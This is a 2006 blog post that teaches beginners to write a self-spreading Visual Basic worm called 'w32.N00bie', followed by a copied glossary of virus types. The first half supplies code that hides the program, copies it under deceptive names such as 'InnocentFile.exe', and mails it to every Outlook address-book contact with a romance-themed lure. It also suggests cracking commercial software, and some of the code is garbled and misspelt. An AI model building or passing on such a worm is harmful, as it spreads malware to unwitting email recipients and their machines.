Blog Best Viewed In Mozilla FireFox



Writin a Worm Tool !
9 October 2006

Writing a worm tool :)

A Worm is a simple and easy program that can spread by itself to other machines. What is the diffrence between a
Worm and a Virus? A Virus is a Program that can infect documents but must be sent by a person to be able to
spread. A worm can spread itself by Email and it can spread itself at anytime. A Worm can be made in any
Programming Language avaliable. Some of the programming Languages I would prefer to make a worm are:

-Visual Basic
-C++
-Delphi
-Javascript
-Visual Basic Scripting

These Languages can all be used ot make worms. Easier languages like Batch can also be used to make worms.
The worm has one mail goal and that goal is to spread to another Machine. Some of the many ways of spreading
include:

-Email
-Injection
-Infection of files
-File Sharing
-Exploits such as the Dcom Exploit W32.Blaster Used
-Messenger Exploits


These can all be used to spread a file to another machine. I usually use the Email, Binary Injection and File Sharing
Methods to spread my Worm. I am going to show you how to make a Worm in Visual Basic. Visual Basic is easy to
learn and is a begginer Language. What is nice about Visual Basic is once you have mastered it you are ready to
move up to a higher language such as C++. Visual Basic and Delphi are the same accept for one major diffrence.
That diffrence is that Visual Basic requires the Runtimes Files to run when Delphi dosent. You can download and
crack programs such as www.Thinstall.com or www.Winzip.com and have your worm drop the runtime files. If your
worm is in Visual Basic.

Now the 1st thing we are going to do is show you what our worm we are going to create is going to preform. The
worm we are going to create is w32.N00bie. This worm is not very powerfull but is good for the beginner. To be able
to create this worm you will need Microsoft Visual Basic. Visual Basic is a RPD or Rapid Application Builder. We
will now begin to make our 1st program in Visual Basic. Open up Visual Basic and select a Standrad .exe Program.
Now, Visual Basic will load a Windows that is titled "Form1" This is the main form for Visual Basic. This is your
worm. Double click on the window labeld "form1" and you will see the below text

Private formsub_load()


End Sub

You will be coding between this text. (Image One shows a example of where you will be coding)



The 1st thing you will do is hide your worm. A worm must have stealth in order to be considered a "Real" Worm.
One way you can hide any Window in Visual Basic is the below code

Form1.Visible = False

That above code will make form1 Invisible Or you could do this

Me.hide

So, Now let's add Me.Hide into our code. So, the code in Visual Basic should now look like the below.

Private Sub form_Load()
Me.Hide
End Sub

Now So far the only thing your worm will do is Hide itself from the user. So, Now let's make the worm's heart. Now
I said above a worm must do SOME the following things:

-Email
-Injection
-Infection of files
-File Sharing
-Exploits such as the Dcom Exploit W32.Blaster Used
-Messenger Exploits

In this worm we are going to do Emailing, File Shareing and we will also do some DDoS Attacks and More with the
worm on a certain date. So, the 1st thing we want our worm to do is copy itself somewhere on the machine. Why you
may ask? This is a Good Question. The reason why is let's say that the worm is launched in the email attachment
but some how it is deleted when the user restarts. Well, With a copy of the worm on the machine there is always a
good chanche that the worm will be activated again. So Let's have the worm copy itself a few times on the system.
So, This is the code to copy itself to other places on the machine. When I say Copyiteself I mean Like Making a
Exact Copy of itself to another location with a diffrent name. So, We are going to make this sample worm copy
itself to the C:\ Drive using The following File Names:

C:\Worm1.exe
C:\InnocentFile.exe
C:\Me.exe
C:\OpenMe!.exe

So, In Visual Basic in order to have it copy itself with those file names to the c:\ drive we would have to enter the
following code. If you study the code you will understand what it means. I have explained the code alittle better
below.

Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\Worm1.Exe"
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\InnocentFile.exe"
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\Me.EXE"
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\OpenMe!.EXE"

Now what does this code mean piece by piece? I will explain it as best I can below:

Filecopy - This means copy a file.

App.Path + - This Means it will copy the Applications Path

"\" - This is hard to explain. You know how when you are typing a location like C:\ and you see the \? Well in this
code with out the "\" it would look like this C: Windows Desktop Worme.exe So we have to add this in "\" to get it
to look like C:\Windows\Desktop\Worme.exe

App.EXEname + - This means that it's going to make a copy of the Applications Original .Exe Name

.exe - File extenstion

Then after the location of the file has been selected you need to tell Visual Basic where to copy the worm to. So,
You see the last part of this code (The Part In Bolad)

Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\OpenMe!.EXE"

This is where we will specify where we want a copy of the worm to be copied to. So If you changed the last part of
the code to C:\Windows\Openme!.exe it would make a copy of the worm to C:\Windows\Openme!.exe

Now, I hope I havent confused you alot. If I have I am sorry! Lol Anyway Your Visual Basic code should now
look like this

Private Form Sub_Load()
Me.hide
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\Worm1.Exe"
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\InnocentFile.exe"
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\Me.EXE"
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\OpenMe!.EXE"
End Sub

So Now you have your worm doing the following actions

Hiding itself from the user (Stealthing itself)
Copying a Exact Copy of itself to C:\Worm1.Exe, C:\Innocentfile.exe, C:\Me.exe, C:\Openme.exe

Now, let's make your worm spread. Now, The easiest way for a worm to spread is Via-Email. Email is the #1
Spreading Method of a Internet Worm. So, Now let's add the email code into this program.

(Note: For the email code to work you will need to add a Windows Scripting Control into your program. If you don't
then your worm will not preform the email task. You add a WSC the same way you add a Winsock Control)

Now Add this Visual Basic Scripting code into your program's code:

Set so = CreateObject(fso)
Set ol = CreateObject("Outlook.Application")
Set out = Wscript.CreateObject("Outlook.Application")
Set mapi = out.GetNameSpace("MAPI")
Set a = mapi.AddressLists(1)
For X = 1 To a.AddressEntries.Count
Set Mail = ol.CreateItem(0)
Mail.to = ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(X)
Mail.Subject = "Fwd:None"
Mail.Body = "Do you want to suprise your wife or husband? Do you want to do something Romantic for them?
Wanna find out how to get lucky Sydney has made this Awesome Document Attached. It tells men everything a
Lady wants! And Ladies you can add stuff onto it before forwarding it to all your freinds!"
Mail.Attachments.Add = "C:\Worm1.exe"
Mail.Send
Next
ol.Quit

Now your worm emails itself. I want to let you know that when you compile the Visual Basic code that this Vbs
Code may give you a error. Well, If it does Delete any code that gives you the error. It's usually the 1st Set
So=CreateObject(fso) if this occurs just delete it and then try recompileing. It should work. If it dosent
troubleshoot and you will manage to fix the problem! Anyway, Your Visual Basic code should now look like this


Private Form Sub_Load()
Me.hide
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\Worm1.Exe"
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\InnocentFile.exe"
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\Me.EXE"
Filcopy App.Path + "\" + App.EXEName + ".exe", "C:\OpenMe!.EXE"
Set so = CreateObject(fso)
Set ol = CreateObject("Outlook.Application")
Set out = Wscript.CreateObject("Outlook.Application")
Set mapi = out.GetNameSpace("MAPI")
Set a = mapi.AddressLists(1)
For X = 1 To a.AddressEntries.Count
Set Mail = ol.CreateItem(0)
Mail.to = ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(X)
Mail.Subject = "Fwd:None"
Mail.Body = "Do you want to suprise your wife or husband? Do you want to do something Romantic for them?
Wanna find out how to get lucky Sydney has made this Awesome Document Attached. It tells men everything a
Lady wants! And Ladies you can add stuff onto it before forwarding it to all your freinds!"
Mail.Attachments.Add = "C:\Worm1.exe"
Mail.Send
Next
ol.Quit
End Sub

Now you have a Worm! How is this a worm? A worm is a file that can email itself, Infect other computers with out
having to have a person email the file the worm will do it by itself.


TYPES OF WORMS

Overwrite Method - This is the Quickest Method for making a worm infect documents on the machine. It will overwrite them. It's like this. Each Windows Computer has a C:\Windows\Defrag.exe , So your worm will do this it will copy itself as c:\windows\defrag.exe

Binary Infection - This Method is not easy! Binary is hard for newbies. Binary Infection is where a worm made in anylanguage (YES, IT IS POSSIABLE IN BATCH) to infect a Document's binary. Let's use disk defragger again. We know all windows computers has c:\windows\defrag.exe so, our worms will open up the binary (The binary is like the DNA of a File. It controls the body. It's like it's Genetic code) and it will copy the worms binary to the end or beggining of the c:\windows\defrag.exe's binary. This means that each time disk defragger is ran the worm is running with it inside of defrag.exe! This is a hard process to configure.

Injection into a Process - Injection is like this. You know how you go to the dr's office and you get a shot? Well, let's say you went in for a TD shot (Tectnus-DIFFERIHIA) shot. This shot will actually inject "Dead" Bactieria of the Disease into your body so that the immune system can look at it and make a antidote. Well, Injection does the same thing. It shoots the virus into a running process or into a file. Its rather hard to explain. This is another way a worm can spread.

Resident Viruses

This type of virus hides permanently in the RAM memory. From here it can control and intercept all of the operations carried out by the system: corrupting files and programs that are opened, closed, copied, renamed etc.

Resident viruses can be treated as file infector viruses. When a virus goes memory resident, it will remain there until the computer is switched off or restarted (waiting for certain triggers to activate it, such as a specific date and time). In the meantime it sits and waits in hiding, unless of course an antivirus can locate and eliminate it.

Examples include: Randex, CMJ, Meve, MrKlunky.



Direct Action Viruses

The principal aim of these viruses is to replicate and take action when they are executed. When a specific condition is met, the virus will go into action and infect files in the directory or folder that it is in and in directories that are specified in the AUTOEXEC.BAT file PATH. This batch file is always located in the root directory of the hard disk and carries out certain operations when the computer is booted.

Files infected with this type of virus can be disinfected, and completely restored to their original condition.



Overwrite Viruses

This type of virus is characterized by the fact that it deletes the information contained in the files that it infects, rendering them partially or totally useless once they have been infected.

Infected files do not change size, unless the virus occupies more space than the original file, because instead of hiding within a file, the virus replaces the files content.

The only way to clean a file infected by an overwrite virus is to delete the file completely, thus losing the original content.

Examples of this virus include: Way, Trj.Reboot, Trivial.88.D.



Boot Virus

This type of virus affects the boot sector of a floppy or hard disk. This is a crucial part of a disk, in which information on the disk itself is stored together with a program that makes it possible to boot (start) the computer from the disk.

This kind of virus does not affect files, but rather the disks that contain them. First they attack the boot sector of the disk then, once you start your computer, the boot virus will infect the hard drive of your computer.

The best way of avoiding boot viruses is to ensure that floppy disks are write-protected and never start your computer with an unknown floppy disk in the disk drive.

Some examples of boot viruses include: Polyboot.B, AntiEXE.



Macro Virus

Macro viruses infect files that are created using certain applications or programs that contain macros. These include Word documents (DOC extensions), Excel spreadsheets (XLS extensions), PowerPoint presentations (PPS extensions), Access databases (MDB extensions), Corel Draw etc.

A macro is a small program that a user can associate to a file created using certain applications. These mini-programs make it possible to automate series of operations so that they are performed as a single action, thereby saving the user from having to carry them out one by one.

When a document containing macros is opened, they will automatically be loaded and may be executed immediately or when the user decides to do so. The virus will then take effect by carrying out the actions it has been programmed to do, often regardless of the program's built-in macro virus protection.

There is not just one type of macro virus, but one for each tool: Microsoft Word, Microsoft Excel, Microsoft PowerPoint, Microsoft Access, Corel Draw, Lotus Ami Pro, etc.

Some examples of macro viruses: Relax, Melissa.A, Bablas, O97M/Y2K.



Directory Virus

An operating system finds files by looking up the path (composed of the disk drive and directory) in which each file is stored.

Directory viruses change the paths that indicate the location of a file. By executing a program (file with the extension .EXE or .COM) which has been infected by a virus, you are unknowingly running the virus program, while the original file and program have been previously moved by the virus.

Once infected it becomes impossible to locate the original files.



Encrypted

Encryption is a technique used by viruses so that they cannot be detected by antivirus programs.

The virus encodes or encrypts itself so as to be hidden from scans, before performing its task it will decrypt itself. Once it has unleashed its payload the virus will then go back into hiding.

Examples of encrypted viruses include: Elvira, Trile.



Polymorphic Virus

Polymorphic viruses encrypt or encode themselves in a different way (using different algorithms and encryption keys) every time they infect a system.

This makes it impossible for antiviruses to find them using string or signature searches (because they are different in each encryption) and also enables them to create a large number of copies of themselves.

Some examples include: Elkern, Marburg, Satan Bug, Tuareg.



Multipartite Virus

These advanced viruses can create multiple infections using several techniques. Their objective is to attack any elements that can be infected: files, programs, macros, disks, etc.

They are considered fairly dangerous due to their capacity to combine different infection techniques.

Some examples include: Ywinz.




File Infectors

This type of virus infects programs or executable files (files with an .EXE or .COM extension). When one of these programs is run, directly or indirectly, the virus is activated, producing the damaging effects it is programmed to carry out. The majority of existing viruses belong to this category, and can be classified depending on the actions that they carry out.



Companion Viruses

Companion viruses can be considered file infector viruses like resident or direct action types. They are known as companion viruses because once they get into the system they "accompany" the other files that already exist. In other words, in order to carry out their infection routines, companion viruses can wait in memory until a program is run (resident viruses) or act immediately by making copies of themselves (direct action viruses).

Some examples include: Stator, Asimov.1539, Terrax.1069



FAT Virus

The file allocation table or FAT is the part of a disk used to connect information and is a vital part of the normal functioning of the computer.

This type of virus attack can be especially dangerous, by preventing access to certain sections of the disk where important files are stored. Damage caused can result in information losses from individual files or even entire directories.



Worms

A worm is a program very similar to a virus; it has the ability to self-replicate, and can lead to negative effects on your system and most importantly they are detected and eliminated by antiviruses. However, worms are not strictly viruses, as they do not need to infect other files in order to reproduce.

Worms can exist without damaging files, and can reproduce at rapid speeds, saturating networks and causing them to collapse.

Worms almost always spread through e-mail, networks and chat (such as IRC or ICQ). They can also spread within the memory of a computer.

Some examples of worms include: PSWBugbear.B, Lovgate.F, Trile.C, Sobig.D, Mapson.



Trojans or Trojan Horses

Another unsavory breed of malicious code are Trojans or Trojan horses, which unlike viruses do not reproduce by infecting other files, nor do they self-replicate like worms.

Trojans work in a similar way to their mythological namesake, the famous wooden horse that hid Greek soldiers so that they could enter the city of Troy undetected.

They appear to be harmless programs that enter a computer through any channel. When that program is executed (they have names or characteristics which trick the user into doing so), they install other programs on the computer that can be harmful.

A Trojan may not activate its effects at first, but when they do, they can wreak havoc on your system. They have the capacity to delete files, destroy information on your hard drive and open up a backdoor to your system. This gives them complete access to your system allowing an outside user to copy and resend confidential information.

Some examples of Trojans are: IRC.Sx2, Trifor.




Logic Bombs

They are not considered viruses because they do not replicate. They are not even programs in their own right but rather camouflaged segments of other programs.

Their objective is to destroy data on the computer once certain conditions have been met. Logic bombs go undetected until launched, and the results can be destructive.



False Viruses

These messages are often confused for viruses but are something else entirely. It is important to know the difference between a real virus threat and a false virus.

Hoaxes are not viruses, they are false messages sent by e-mail, warning users of a non-existent virus. The intention is to spread rumors causing panic and alarm among users who receive this kind of information.

Occasionally, hoax warnings include technical terms to mislead users. On some other occasions, the names of some press agencies are mentioned in the heading of the warnings. In this way, the hoax author attempts to trick users into believing that they have received a warning about a real virus. Hoaxes try to fool the user into performing a series of actions to protect themselves from the virus, sometimes leading to negative results.

Users are advised not to pay attention to these misleading warnings and delete these messages once received without sending them to others.

Labels:




Computers Blogs - Blog Top Sites Computers Blogs - Blog FlareMy Blog DirectoryPage copy protected against web site content infringement by Copyscape



BookMark me:||del.icio.us || Digg it || Furl || Google || Spurl || Yahoo MyWeb
 
posted by VaTsAl at 8:28 pm | Permalink


0 Comments: